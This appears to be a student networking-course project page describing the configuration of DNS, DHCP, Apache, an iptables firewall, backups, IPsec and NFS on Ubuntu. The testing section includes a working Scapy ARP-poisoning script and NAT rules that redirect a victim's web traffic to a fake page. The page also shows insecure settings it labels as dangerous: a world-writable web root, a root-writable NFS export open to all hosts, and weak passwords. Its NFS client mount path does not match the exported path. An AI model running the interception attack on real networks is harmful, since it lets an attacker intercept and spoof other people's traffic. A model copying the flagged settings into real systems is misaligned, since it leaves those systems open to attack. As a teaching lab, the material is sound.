Data Networking/Spring 2017/JXM

Motivation
As a network engineer, it is essential to understand and implement network configurations on the Linux operating system. This project designs a dynamic network for a small company using a Domain Name System (DNS) server, a Dynamic Host Configuration Protocol (DHCP) server, a web server, a firewall and a backup server. Servers and clients obtain their IP addresses automatically from the DHCP server and resolve names through the DNS server, and clients fetch web pages from the web server. The firewall and the backup server are added to make the configuration secure and robust: the firewall limits what can reach the servers, and the backup server keeps a copy of the web content that survives a failure or a compromise of the web server.

Team Members
Junhao Huang

Xinchen Zhang

Mayank Kashyap

Domain Name System
Domain Name System (DNS) is a hierarchical naming system for computers and services. It translates human-readable domain names into numerical IP addresses. A DNS name server stores the records for a domain (its zone) and answers queries from that database. The most common record types are:
 * A and AAAA: the IPv4 and IPv6 addresses of a hostname
 * NS: Name Server, the hostname of an authoritative server for the zone
 * MX: Mail Exchanger, the hostname of the SMTP server that accepts mail for the domain
 * CNAME: Canonical Name, an alias that points one name at another (canonical) name
 * PTR: Pointer, the reverse mapping from an IP address to a hostname, kept in the in-addr.arpa (IPv4) and ip6.arpa (IPv6) zones

Dynamic Host Configuration Protocol
Dynamic Host Configuration Protocol (DHCP) is a client/server protocol that automatically provides an Internet Protocol (IP) host with its IP address and other related configuration information such as the subnet mask and default gateway. RFCs 2131 and 2132 define DHCP as an Internet Engineering Task Force (IETF) standard based on Bootstrap Protocol (BOOTP), a protocol with which DHCP shares many implementation details. DHCP allows hosts to obtain required TCP/IP configuration information from a DHCP server.

Why is DHCP required?

Every device on a TCP/IP-based network must have a unique unicast IP address to access the network and its resources. Without DHCP, IP addresses for new computers, or for computers moved from one subnet to another, must be configured manually, and the addresses of computers removed from the network must be reclaimed manually. With DHCP this process is automated and managed centrally. The DHCP server maintains a pool of IP addresses and leases an address to any DHCP-enabled client when it starts up on the network. Because the addresses are dynamic (leased) rather than static (permanently assigned), addresses no longer in use are automatically returned to the pool for reallocation. The network administrator sets up DHCP servers that hold the TCP/IP configuration and hand it to DHCP-enabled clients as a lease offer. The DHCP server stores this configuration in a database that includes:
 * Valid TCP/IP configuration parameters for all clients on the network.
 * Valid IP addresses, maintained in a pool for assignment to clients, as well as excluded addresses.
 * Reserved IP addresses associated with particular DHCP clients, so that a given client always receives the same address.
 * The lease duration: how long the IP address can be used before a lease renewal is required.

A DHCP-enabled client, upon accepting a lease offer, receives:
 * A valid IP address for the subnet to which it is connecting.
 * The requested DHCP options: additional parameters the server is configured to hand out, such as Router (default gateway), DNS Servers and DNS Domain Name. The full set of options is defined in RFC 2132.

Note that DHCP has no authentication: any host on the segment can answer a client's DISCOVER, so the gateway and DNS server a client ends up using are only as trustworthy as the LAN itself (the ARP poisoning in the Integrated Testing section exploits the same lack of authentication one layer down).


Webserver
The basic function of a web server is to store, process and deliver web pages to clients.

Apache2 is the most popular choice for a web server on Linux. phpMyAdmin is a web front end for administering the MySQL database behind a dynamic site; it is not needed to serve static pages, and because it exposes database administration over HTTP it should not be reachable from untrusted networks.

Firewall
A firewall is a system that filters traffic between an internal network and outside networks such as the Internet.

By writing rules on the server we accept only the services we want to offer and block everything else, so the internal network is exposed as little as possible to attacks from the Internet. On Linux the packet filter is netfilter, configured here with iptables.

Backup
A backup server keeps copies of the web server's files and data on another machine, so that they are not lost if the web server is damaged, fails or is compromised.

Requirements

 * Configure a DNS server to resolve domain names and reverse (IP to name) lookups
 * Configure a DHCP server to assign IPv4 and IPv6 addresses dynamically
 * Implement a web server to host a web page
 * Implement a backup server that automatically copies the web server's files over SSH, and an NFS server
 * Create a firewall to secure the network

DNS
Master DNS

Step 1: Install the BIND9 DNS server.
Step 2: Change the hostname and the hosts file.
Step 3: Edit the name servers.
Step 4: Edit the forwarders.
Step 5: Define the forward and reverse zones in the BIND zone configuration (on Ubuntu, /etc/bind/named.conf.local). The master is 192.168.10.2 and the slave is 192.168.10.3; allow-transfer restricts zone transfers (AXFR) to the slave, so that nobody else can dump the whole host list, and also-notify tells the slave to refresh as soon as the zone changes:

 # Forward IPv4 zone
 zone "jjxm.com" {
     type master;
     file "/etc/bind/db.jjxm.com";
     allow-transfer { 192.168.10.3; };
     also-notify { 192.168.10.3; };
 };

 # Reverse zone for 192.168.10.0/24
 zone "10.168.192.in-addr.arpa" {
     type master;
     file "/etc/bind/db.192";
     allow-transfer { 192.168.10.3; };
     # the original repeated allow-transfer here, which BIND rejects as a
     # redefined option; also-notify mirrors the forward zone
     also-notify { 192.168.10.3; };
 };

Step 6: Create the zone files.
Step 7: Restart bind9.

Slave DNS

Step 1: Define the forward and reverse zones as slaves. A slave zone must name the master it pulls from (masters), which the original omitted; without it BIND refuses to load the zone:

 # Forward IPv4 zone
 zone "jjxm.com" {
     type slave;
     masters { 192.168.10.2; };
     file "/etc/bind/db.jjxm.com";
     allow-transfer { 192.168.10.2; };
 };

 # Reverse zone
 zone "10.168.192.in-addr.arpa" {
     type slave;
     masters { 192.168.10.2; };
     file "/etc/bind/db.192";
     allow-transfer { 192.168.10.2; };
 };

If named cannot write the transferred copies into /etc/bind (on Ubuntu, AppArmor only allows it to write under /var/cache/bind), point the file statements there instead.

Step2: Restart the bind9
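The zone files themselves (Step 6 of the master configuration) are not shown on the page. The script below is an added example, not part of the original project: it generates the forward zone file db.jjxm.com and the matching reverse zone file db.192 for 10.168.192.in-addr.arpa from one host table, so the A and PTR records cannot drift apart. The master 192.168.10.2 and slave 192.168.10.3 are the page's addresses; the hostnames ns1, ns2 and www, the web server address 192.168.10.10, the admin mailbox and the timer values are assumptions.

```sh
#!/bin/sh
# Added example: generate forward and reverse zone files from one host table.
# Assumed: hostnames, www address, admin mailbox, TTL/SOA timers.

ZONE=jjxm.com
SERIAL=2017040701    # YYYYMMDDnn; bump it on every edit or the slave never refreshes

# Constructed host table, "name ip" per line.
HOSTS='ns1 192.168.10.2
ns2 192.168.10.3
www 192.168.10.10'

# 192.168.10.0 -> 10.168.192.in-addr.arpa (valid for a /24 network)
reverse_zone_name() {
    set -- $(printf '%s' "$1" | tr . ' ')
    printf '%s.%s.%s.in-addr.arpa\n' "$3" "$2" "$1"
}

# Inside a /24 reverse zone the owner name of a PTR record is the last octet.
last_octet() {
    printf '%s' "$1" | cut -d. -f4
}

# SOA and NS records shared by both zones. Listing the slave as NS is what
# keeps clients resolving when the master is down (the page's DNS test).
zone_header() {
    printf '$TTL 3600\n'
    printf '@ IN SOA ns1.%s. admin.%s. ( %s 3600 900 604800 300 )\n' \
        "$ZONE" "$ZONE" "$SERIAL"
    printf '@ IN NS ns1.%s.\n' "$ZONE"
    printf '@ IN NS ns2.%s.\n' "$ZONE"
}

forward_zone() {
    zone_header
    printf '%s\n' "$HOSTS" | while read -r name ip; do
        [ -n "$name" ] || continue
        printf '%s IN A %s\n' "$name" "$ip"
    done
}

reverse_zone() {
    zone_header
    printf '%s\n' "$HOSTS" | while read -r name ip; do
        [ -n "$name" ] || continue
        printf '%s IN PTR %s.%s.\n' "$(last_octet "$ip")" "$name" "$ZONE"
    done
}
```

Write the output to /etc/bind/db.jjxm.com and /etc/bind/db.192, then validate each file before restarting BIND with `named-checkzone jjxm.com /etc/bind/db.jjxm.com` and `named-checkzone 10.168.192.in-addr.arpa /etc/bind/db.192`; a typo in a zone file otherwise makes named silently refuse to serve that zone.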

DHCP
To set up the DHCP server, open a new Ubuntu VM that will serve as the DHCP server for the network. Once configured, this VM can no longer reach the Internet, because its domain name and name servers are changed to the lab's internal ones. We use the ISC (Internet Systems Consortium) DHCP server in this project; the installation steps are:

Step 1: Install ISC's DHCP server from the terminal.
Step 2: Set the network interface ("ens33") in /etc/default/isc-dhcp-server and enable IPv6 by adding "OPTIONS=-6".
Step 3: Edit the DHCP configuration file for IPv4 (/etc/dhcp/dhcpd.conf).
Step 4: Give the VM a static address by editing /etc/network/interfaces (a DHCP server must not obtain its own address by DHCP).
Step 5: Edit the resolver file.
Step 6: Enable IPv4 and IPv6 forwarding.
Step 7: Install radvd for IPv6 router advertisements.
Step 8: Configure dhcpd6.conf to add the IPv6 address pool.
Step 9: Edit the radvd configuration file.
Step 10: Restart the network interface (NOTE: THIS WILL DISABLE YOUR INTERNET CONNECTION IN THE VM).
Step 11: Start the DHCP server for IPv4 and IPv6.
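The configuration files of Steps 3 and 8 are not reproduced on the page. Below is an added example, not the project's own files, of a dhcpd.conf and dhcpd6.conf for the 192.168.10.0/24 network used throughout this page, wrapped in shell functions so the output can be written and checked. Assumptions: the router is 192.168.10.1 (the address the ARP section spoofs), the DNS servers are the page's master and slave 192.168.10.2 and 192.168.10.3, the dynamic pool is .100 to .200, the web server's MAC address and reserved address .10 are made up, and the IPv6 prefix fd00:10::/64 is made up.

```sh
#!/bin/sh
# Added example: ISC dhcpd configuration for the lab network.
# Assumed: router .1, pool .100-.200, web server MAC and .10, IPv6 prefix.

gen_dhcpd4_conf() {
    cat <<'EOF'
# authoritative: answer DHCPNAK for leases we do not know about on this
# segment; without it a client holding a stale address keeps it silently.
authoritative;
default-lease-time 600;
max-lease-time 7200;
ddns-update-style none;
option domain-name "jjxm.com";
option domain-name-servers 192.168.10.2, 192.168.10.3;

subnet 192.168.10.0 netmask 255.255.255.0 {
    range 192.168.10.100 192.168.10.200;
    option routers 192.168.10.1;
    option broadcast-address 192.168.10.255;
}

# Reservation: the web server always gets .10, so its DNS A record stays
# valid. Reservations key on the client MAC, which any host on the LAN can
# spoof; they are a convenience, not access control.
host webserver {
    hardware ethernet 00:0c:29:aa:bb:cc;
    fixed-address 192.168.10.10;
}
EOF
}

gen_dhcpd6_conf() {
    cat <<'EOF'
# IPv6 pool. radvd must advertise the prefix with the "managed" flag set,
# otherwise clients only autoconfigure and never ask DHCPv6 for an address.
default-lease-time 600;
max-lease-time 7200;
option dhcp6.name-servers fd00:10::2, fd00:10::3;
option dhcp6.domain-search "jjxm.com";

subnet6 fd00:10::/64 {
    range6 fd00:10::100 fd00:10::1ff;
}
EOF
}

# Structural check usable without dhcpd installed: every "{" has a "}".
braces_balanced() {
    opens=$(printf '%s' "$1" | tr -cd '{' | wc -c | tr -d ' ')
    closes=$(printf '%s' "$1" | tr -cd '}' | wc -c | tr -d ' ')
    [ "$opens" -eq "$closes" ]
}
```

Write the two files to /etc/dhcp/dhcpd.conf and /etc/dhcp/dhcpd6.conf and let the daemon parse them before starting it: `dhcpd -t -cf /etc/dhcp/dhcpd.conf` and `dhcpd -6 -t -cf /etc/dhcp/dhcpd6.conf` report syntax errors without touching the network.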

Web server
Step 1: We use Apache as our web server, so we install Apache first.
Command:

sudo apt-get update
sudo apt-get install apache2

Step 2: Install PHP Command:

sudo apt-get install php

Step 3: Install MySQL and set the root password. The project used "linux" as a placeholder; on any deployment that is reachable by other hosts, use a strong, unique password.
Command:

sudo apt-get install mysql-server

Step 4: Check if mysql is working Command:

sudo netstat -tap | grep mysql

 tcp        0      0 localhost:mysql         *:*                     LISTEN      841/mysqld

Step 5: Install phpMyAdmin, choose apache2 as the web server when prompted, and set its password (again "linux" in the project; treat that as a placeholder).
Command:

sudo apt-get install phpmyadmin

Step 6: The project made /var/www writable for everyone before creating the phpMyAdmin link. This is not actually necessary (the ln command in the next step runs under sudo) and it is dangerous: a world-writable document root lets any local user, or any code running as the web server, replace the site's pages. Leave /var/www owned by root and writable only by its owner, and skip this command.
Command:

sudo chmod 777 /var/www

Step 7: Create a symbolic link from /usr/share/phpmyadmin into /var/www/html; afterwards a phpmyadmin entry appears in /var/www/html. This publishes the database administration interface to every client that can reach the web server, so restrict access to it (for example to the internal subnet) in the Apache configuration.
Command:

sudo ln -s /usr/share/phpmyadmin /var/www/html

Step 8: Create a basic web page, index.html, and confirm that it appears in /var/www/html.

Step 9: Go into the configuration of apache2 and change the default webpage catalog “/var/www” to “/home/ttno1”, and there is no '/' after directory path Command:

sudo vi /etc/apache2/apache2.conf

Step 10: Go into the configuration of 000-default and change the default webpage catalog “/var/www/html” to “/home/ttno1” Command:

sudo vi /etc/apache2/sites-available/000-default.conf

Step 11: We need to restart the apache Command:

sudo /etc/init.d/apache2 restart

Step 12: Use a browser on another host to visit the web server by its IP address.

Firewall
Step 1: List the current iptables rules. On a server that has never been configured you should see three empty chains, all with policy ACCEPT:

Command: sudo iptables -L

 Chain INPUT (policy ACCEPT)
 target     prot opt source               destination

 Chain FORWARD (policy ACCEPT)
 target     prot opt source               destination

 Chain OUTPUT (policy ACCEPT)
 target     prot opt source               destination

Step 2: Allow traffic that belongs to an already established or related connection (replies to our own outbound connections, FTP data channels, ICMP errors):

Command: sudo iptables -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT

If the conntrack match is not available on your kernel, the older state match can be used instead.

Step 3: Open the ports for SSH, HTTP/HTTPS, FTP, TFTP, DHCPv6, DNS and VPN (PPTP, L2TP and IPsec NAT traversal). Every rule here is appended (-A), so their order among themselves does not matter, but all of them must come before the final DROP of Step 15. Each open port is attack surface: only open the services this particular host really runs.

Command: sudo iptables -A INPUT -p tcp --dport 22 -j ACCEPT

sudo iptables -A INPUT -p tcp --dport 80 -j ACCEPT

sudo iptables -A INPUT -p tcp --dport 443 -j ACCEPT

sudo iptables -A INPUT -p tcp --dport 20 -j ACCEPT

sudo iptables -A INPUT -p tcp --dport 21 -j ACCEPT

sudo iptables -A OUTPUT -p tcp --dport 20 -j ACCEPT

sudo iptables -A OUTPUT -p tcp --dport 21 -j ACCEPT

sudo iptables -A INPUT -p tcp --dport 53 -j ACCEPT

sudo iptables -A INPUT -p udp --dport 53 -j ACCEPT

sudo iptables -A INPUT -p udp --dport 546 -j ACCEPT

sudo iptables -A INPUT -p udp --dport 547 -j ACCEPT

(DNS must be open on UDP as well as TCP, since ordinary queries use UDP; DHCPv6 on ports 546/547 uses UDP only. The original listed 53 as TCP only and 546/547 as TCP.)

sudo iptables -A INPUT -p tcp --dport 1723 -j ACCEPT

sudo iptables -A INPUT -p udp --dport 500 -j ACCEPT

sudo iptables -A INPUT -p udp --dport 4500 -j ACCEPT

sudo iptables -A INPUT -p udp --dport 69 -j ACCEPT

sudo iptables -A OUTPUT -p udp --dport 69 -j ACCEPT

sudo iptables -A INPUT -p udp --dport 1701 -j ACCEPT

sudo iptables -A INPUT -p tcp --dport 21 -m state --state NEW,ESTABLISHED -j ACCEPT

sudo iptables -A OUTPUT -p tcp --sport 21 -m state --state ESTABLISHED -j ACCEPT

Step 4: Insert a rule at the top of the INPUT chain that accepts everything on the loopback interface, so local services (MySQL, the resolver, phpMyAdmin talking to the database) can communicate with each other:

Command: sudo iptables -I INPUT 1 -i lo -j ACCEPT

Step 5: Accept all traffic on the loopback interface in both directions (the INPUT rule duplicates Step 4; one of the two is enough):

Command: sudo iptables -A INPUT -i lo -j ACCEPT

sudo iptables -A OUTPUT -o lo -j ACCEPT

Step 6: Allow our own outgoing connections to continue:

Command: sudo iptables -A OUTPUT -m conntrack --ctstate ESTABLISHED -j ACCEPT

Step 7: Forward traffic from the internal to the external side. The VM has a single interface, so both the input and the output interface are ens33:

Command: sudo iptables -A FORWARD -i ens33 -o ens33 -j ACCEPT

Step 8: To drop Invalid Packets

Command: sudo iptables -A INPUT -m conntrack --ctstate INVALID -j DROP

Step 9: Deny ping (ICMP echo requests). REJECT answers with an ICMP port-unreachable error by default, which is what the client sees in the firewall test below:

Command: sudo iptables -A INPUT -p icmp --icmp-type echo-request -j REJECT

Step 10: Limit each client to 10 concurrent SSH connections. Note that, appended here, this rule sits after the unconditional port 22 ACCEPT of Step 3 and can never match; it has to be inserted (-I) above that rule to take effect.

Command: sudo iptables -A INPUT -p tcp --dport 22 -m connlimit --connlimit-above 10 -j REJECT

Step 11: Rate-limit new HTTP connections to slow down an HTTP flood. As written, this rule is also appended after the unconditional port 80 ACCEPT of Step 3 and is never reached; placed before that ACCEPT, and followed by a DROP for port 80, it accepts 100 new connections per minute (with a burst of 200) and drops the excess.

Command: sudo iptables -A INPUT -p tcp --dport 80 -m limit --limit 100/minute --limit-burst 200 -j ACCEPT

Step 12: If an IP address needs to be blocked, insert a DROP for it at the top of the chain so it is evaluated before any ACCEPT:

Command: sudo iptables -I INPUT -s 192.168.10.134 -j DROP

Step 13: To unblock the IP address, delete the same rule:

Command: sudo iptables -D INPUT -s 192.168.10.134 -j DROP

Step 14: Permit IPsec VPN traffic: IKE (UDP 500), NAT traversal (UDP 4500) and the ESP protocol itself. The first two repeat rules from Step 3.

Command: sudo iptables -A INPUT -p udp --dport 500 -j ACCEPT

sudo iptables -A INPUT -p udp --dport 4500 -j ACCEPT

sudo iptables -A INPUT -p esp -j ACCEPT

Step 15: Drop everything else. This must be the last rule in the INPUT chain: anything appended after it is never evaluated.

Command: sudo iptables -A INPUT -j DROP

Step 16: To preserve the iptables rules across reboots, install iptables-persistent:

Command: sudo apt-get install iptables-persistent

Step 17: Whenever the rules change, save them so that they are reloaded after a reboot, and reload them to check that the saved set is what you expect:

Command: sudo netfilter-persistent save

sudo netfilter-persistent reload
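The steps above build the chain by appending one rule at a time, which is where the ordering problems in Steps 10, 11 and 15 come from. The following is an added example, not the project's ruleset: the same policy written out in the iptables-restore format that iptables-persistent saves and loads, with the rules in an order that actually works, a default DROP policy instead of a trailing DROP rule, and small helpers that check the order of two rules before the file is loaded. Assumptions: the LAN is 192.168.10.0/24 and this host offers only SSH, HTTP/HTTPS and DNS; the FTP, TFTP and VPN rules of Step 3 are left out.

```sh
#!/bin/sh
# Added example: an ordered INPUT policy in iptables-restore(8) format.
# Assumed: LAN 192.168.10.0/24; host runs SSH, HTTP/HTTPS and DNS only.
# iptables evaluates a chain top-down and stops at the first match, so a
# plain "--dport 80 -j ACCEPT" placed before a rate limit makes the limit
# unreachable, and nothing after a final DROP is ever evaluated.

gen_rules() {
    cat <<'EOF'
*filter
:INPUT DROP [0:0]
:FORWARD DROP [0:0]
:OUTPUT ACCEPT [0:0]
# 1. loopback and already-tracked traffic first: most common, cheapest
-A INPUT -i lo -j ACCEPT
-A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
-A INPUT -m conntrack --ctstate INVALID -j DROP
# 2. SSH: LAN only, and at most 10 concurrent connections per source
-A INPUT -p tcp --dport 22 -s 192.168.10.0/24 -m connlimit --connlimit-above 10 -j REJECT --reject-with tcp-reset
-A INPUT -p tcp --dport 22 -s 192.168.10.0/24 -m conntrack --ctstate NEW -j ACCEPT
# 3. HTTP: the rate limit must come BEFORE the accept; excess is dropped
-A INPUT -p tcp --dport 80 -m conntrack --ctstate NEW -m limit --limit 100/minute --limit-burst 200 -j ACCEPT
-A INPUT -p tcp --dport 80 -m conntrack --ctstate NEW -j DROP
-A INPUT -p tcp --dport 443 -m conntrack --ctstate NEW -j ACCEPT
# 4. DNS needs UDP as well as TCP
-A INPUT -p udp --dport 53 -j ACCEPT
-A INPUT -p tcp --dport 53 -j ACCEPT
# 5. ICMP echo: reject as the page does; everything else hits the DROP policy
-A INPUT -p icmp --icmp-type echo-request -j REJECT
COMMIT
EOF
}

# Line number of the first rule containing the fixed string $1 (empty if none).
rule_line() {
    gen_rules | grep -n -F -- "$1" | head -n1 | cut -d: -f1
}

# Succeeds if the rule matching $1 comes before the rule matching $2.
ordered_before() {
    a=$(rule_line "$1")
    b=$(rule_line "$2")
    [ -n "$a" ] && [ -n "$b" ] && [ "$a" -lt "$b" ]
}
```

Save the output as /etc/iptables/rules.v4 (the file iptables-persistent reads) and run `iptables-restore --test /etc/iptables/rules.v4` first; it parses the whole file without committing it, so a typo cannot leave the host half-filtered. Because the policy is DROP rather than a trailing DROP rule, a later `iptables -A INPUT ... -j ACCEPT` still works, which is the mistake the step-by-step version invites.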

Backup
Step 1: We use rsync to set up the backup server.
Step 2: Install SSH on both the web server and the backup server.
Step 3: Generate an RSA key pair.
Step 4: Copy the public key to the other host, so rsync can log in without a password.
Step 5: Create a backup archive on the master (web) server.
Step 6: The files are zipped and compressed.
Step 7: The archive is transferred to the backup server.
Step 8: Unzip the original files.
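The page names the tools (rsync, SSH keys, crontab) but not the job itself. The script below is an added example, not the project's script, of the backup job the steps describe, and it goes a little beyond them: it is pull-based, keeps dated snapshots and rotates them. Pulling from the backup server matters because a key that lets the web server push into the backup tree also lets an attacker who owns the web server delete the backups. The web server address 192.168.10.10, the user names, paths and key file are assumptions; on the web server, the backup key's authorized_keys entry should carry a from="..." restriction and a forced rsync command, so the key can do nothing else.

```sh
#!/bin/sh
# Added example: pull-based rsync backup over SSH with snapshot rotation.
# Assumed: web server 192.168.10.10, user "backup", paths and key below.

WEB_HOST=${WEB_HOST:-192.168.10.10}
SRC_DIR=/var/www/html/            # trailing slash: copy the contents, not the dir
DEST_ROOT=${DEST_ROOT:-/srv/backup/web}
KEEP=${KEEP:-7}                   # snapshots to keep
SSH_KEY=/root/.ssh/backup_ed25519

# UTC timestamp that sorts lexically in date order, e.g. 20170407T025200Z
snapshot_name() {
    date -u +%Y%m%dT%H%M%SZ
}

run_backup() {
    snap="$DEST_ROOT/$(snapshot_name)"
    latest="$DEST_ROOT/latest"
    mkdir -p "$DEST_ROOT"
    # --link-dest hard-links files unchanged since the previous snapshot, so
    # every snapshot is a complete tree but only changed files cost space.
    linkdest=
    [ -d "$latest" ] && linkdest="--link-dest=$latest"
    rsync -az --delete --numeric-ids $linkdest \
        -e "ssh -i $SSH_KEY -o BatchMode=yes -o StrictHostKeyChecking=yes" \
        "backup@$WEB_HOST:$SRC_DIR" "$snap/" || return 1
    ln -sfn "$snap" "$latest"
}

# Number of snapshot directories under $1 (names start with a digit).
count_snapshots() {
    ls -1d "$1"/[0-9]* 2>/dev/null | wc -l | tr -d ' '
}

# Delete the oldest snapshots under $1 until only $2 remain.
prune_snapshots() {
    dir=$1
    keep=$2
    excess=$(( $(count_snapshots "$dir") - keep ))
    [ "$excess" -gt 0 ] || return 0
    ls -1d "$dir"/[0-9]* | sort | head -n "$excess" | while read -r old; do
        rm -rf -- "$old"
    done
}

# Cron entry on the backup server (assumed path), nightly at 02:30:
#   30 2 * * * /usr/local/sbin/web_backup.sh run
if [ "${1:-}" = run ]; then
    run_backup && prune_snapshots "$DEST_ROOT" "$KEEP"
fi
```

Test a restore occasionally, not only the copy: `diff -r "$DEST_ROOT/latest" /var/www/html` on the web server (over SSH) shows whether the snapshot really matches, and a snapshot that was never restored is not a backup.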

DNS
Step 1: Use the "nslookup" command to resolve several hostnames against the DNS server.

Step 2: Use the "dig" command to check the DNS records and zone files, and confirm that a zone transfer requested from a host other than the slave is refused (this is what allow-transfer is for).

Step 3: Stop the master DNS server and repeat the nslookup against the slave; it should still answer.

DHCP
Step 1: Use the following command to check the status of the DHCP server.
Step 2: To check that DHCP is leasing out addresses (the DISCOVER, OFFER, REQUEST and ACK exchanges), use the following command after connecting a client to the DHCP server. Errors were highlighted in red in the original screenshot.
Step 3: Check the output on the client and the other hosts. If the hosts with reservations receive the static addresses specified in the DHCP configuration, and a client receives an address in the dynamic range, the test is successful.

Web Server
Step1: Turn on your web server.

Step2: Open a browser on a client and enter the IP address of the web server to check if we can get access to the webpage of the server.

Firewall
Method 1
Ping the client's IP address from the web server's terminal: it succeeds.

Ping the web server's IP address from the client's terminal: it reports "destination port unreachable", the ICMP error that the REJECT rule for echo requests returns.

Method 2
Step 1: Open a browser on a client and enter the IP address of the web server.

Step 2: Block the client's IP address by adding an iptables rule on the web server.

Step 3: Refresh the web page on the client and check that it no longer loads.

Step 4: Delete the iptables rule to allow the client to reach the web server again.

Step 5: Refresh the web page on the client again; it should load.

Backup
Check that the files appear on the backup server after the time set in crontab.

Integrated Testing

ARP
Step 1: We use Scapy with Python to perform ARP poisoning, so we install Scapy first (sysv-rc-conf is used later to start iptables at boot).
Command:

sudo apt-get install tcpdump python3-crypto ipython3
sudo apt install python-scapy
sudo apt install sysv-rc-conf

Step 2: Set a root password so we can work as the superuser (Scapy needs raw sockets, which require root).
Command:

sudo passwd root

Step 3: Make iptables start automatically after a reboot.
Command:

sudo sysv-rc-conf --level 2345 iptables on

Step 4: Turn on IP forwarding Command:

sudo bash -c 'echo 1 > /proc/sys/net/ipv4/ip_forward'

Step 5: Run the ARP poison. The victim 192.168.10.28 is told that the gateway address 192.168.10.1 belongs to the attacker's MAC (Scapy fills in hwsrc with our own address), first with an unsolicited reply (op=2) and then with a request (op=1); the request is resent every 2 seconds, 1000 times, so the victim's ARP cache never recovers. Save the lines as arp_poison.py and run it with sudo, or type them at the scapy prompt (where the import is already done).
Command:

 #!/usr/bin/env python
 from scapy.all import ARP, send

 victim = '192.168.10.28'       # client whose ARP cache is poisoned
 spoof = '192.168.10.1'         # gateway address we claim to be
 mac = '00:0c:29:73:56:67'      # victim's MAC address (hwdst)

 # op=2: ARP reply "192.168.10.1 is-at <our MAC>", sent straight to the victim
 arp = ARP(op=2, psrc=spoof, pdst=victim, hwdst=mac)
 send(arp)
 # op=1: ARP request from 192.168.10.1; most stacks update their cache on this too
 arp = ARP(op=1, psrc=spoof, pdst=victim, hwdst=mac)
 send(arp)
 # keep the entry poisoned: one packet every 2 seconds, 1000 times
 send(arp, inter=2, count=1000)

Step 6: Make a fake web page on the attacker's Apache server.
Command:

/etc/init.d/apache2 start
echo "HAHA U LOSE." > /home/Mayank/index.htm

Step 7: Forward the intercepted traffic: clear the NAT table and the counters, allow forwarding on ens33, masquerade so the victim's other connections keep working through us, and redirect every HTTP request to 192.168.10.30, the host serving the fake page.
Command:

iptables -t nat --flush
iptables --zero
iptables -A FORWARD --in-interface ens33 -j ACCEPT
iptables -t nat --append POSTROUTING --out-interface ens33 -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --dport 80 --jump DNAT --to-destination 192.168.10.30

IPSec
IPsec can be configured between any two virtual machines. In our case we configure IPsec between two Ubuntu VMs with the IP addresses 192.168.10.21 and 192.168.10.25.

Step 1: Install an IPsec implementation on the first host using the following command (strongSwan is the usual choice on Ubuntu).
Step 2: Edit /etc/ipsec.conf to set the connection parameters.
Step 3: Configure the secrets file (/etc/ipsec.secrets) on both hosts. It holds the pre-shared key, so it must be readable by root only, and the key must not be a guessable word.
Step 4: Use this command to restart the ipsec processes.
Step 5: Check the ipsec status.
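Neither configuration file is shown on the page. The following added example, not the project's files, assumes strongSwan and its classic ipsec.conf and ipsec.secrets format, and sets up a host-to-host transport-mode association between the page's two VMs, 192.168.10.21 and 192.168.10.25, authenticated with a pre-shared key. The PSK is generated from /dev/urandom rather than chosen by hand: with PSK authentication the key is the entire security of IKE, and a dictionary word like the passwords used elsewhere on this page can be brute-forced offline from a captured handshake. The connection name and cipher suites are assumptions; the same two files go on both hosts.

```sh
#!/bin/sh
# Added example: strongSwan host-to-host IPsec with a generated PSK.
# Assumed: strongSwan, connection name, cipher suites. Same files on both hosts.

LEFT=192.168.10.21
RIGHT=192.168.10.25

gen_ipsec_conf() {
    cat <<EOF
config setup
    uniqueids=yes

# host-to-host, transport mode: only traffic between the two hosts is protected
conn host-host
    keyexchange=ikev2
    type=transport
    authby=secret
    left=$LEFT
    right=$RIGHT
    ike=aes256-sha256-modp2048!
    esp=aes256gcm16!
    dpdaction=restart
    auto=start
EOF
}

# 32 random bytes, base64-encoded: about 256 bits of entropy, unguessable.
gen_psk() {
    head -c 32 /dev/urandom | base64 | tr -d '\n'
}

# ipsec.secrets line selecting the key by the two peer addresses. $1 = PSK.
gen_ipsec_secrets() {
    printf '%s %s : PSK "%s"\n' "$LEFT" "$RIGHT" "$1"
}

# Reject short keys such as the page's "linux" before they reach the file.
psk_strong_enough() {
    [ "${#1}" -ge 32 ]
}
```

Generate the key once, write it into /etc/ipsec.secrets on both hosts (`chmod 600`, owned by root), copy the key over SSH rather than by email or chat, then `ipsec restart` and `ipsec status` as in Steps 4 and 5; `ipsec statusall` additionally shows the negotiated algorithms, which should match the ike= and esp= lines.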

NFS
NFS-Server

Step 1: Install nfs-kernel-server
Command:

sudo apt-get install nfs-kernel-server
sudo apt-get install rpcbind

Step 2: Create the shared folder
Command: sudo mkdir /home/mayank/Desktop/nfs

Step 3: Edit the export configuration
Command:

sudo vim /etc/exports

and add the line

/home/mayank/Desktop/nfs *(rw,sync,no_root_squash,no_subtree_check)

The "*" exports the directory read-write to every host that can reach the server, and no_root_squash lets a remote root act as root on these files, so anyone on the network can write to the share as root. Outside a throw-away lab, restrict the export to the client subnet (192.168.10.0/24) and leave root_squash (the default) in place.

Step 4: Restart service Command:

sudo service rpcbind restart
sudo service nfs-kernel-server restart

Step 5: Test
Command: showmount -e

 Export list for ubuntu:
 /home/mayank/Desktop/nfs *

NFS-Clients

Step 1: Install nfs-common on the clients
Command:

sudo apt-get install nfs-common sudo apt-get install rpcbind

Step 2: Create the mount point
Command:

mkdir /home/client1/Desktop/nfs

Step 3: Mount the share. The exported path must be exactly the one listed in /etc/exports on the server.
Command:

sudo mount -t nfs 192.168.10.2:/home/nfs/Desktop/nfs /home/client1/Desktop/nfs

Step 4: Mount the share automatically when the client boots, by appending the mount command to /etc/rc.local (an entry in /etc/fstab is the more usual way to do this).
Command:

sudo vim /etc/rc.local

and add the line

sudo mount -t nfs 192.168.10.2:/home/nfs/Desktop/nfs /home/client1/Desktop/nfs
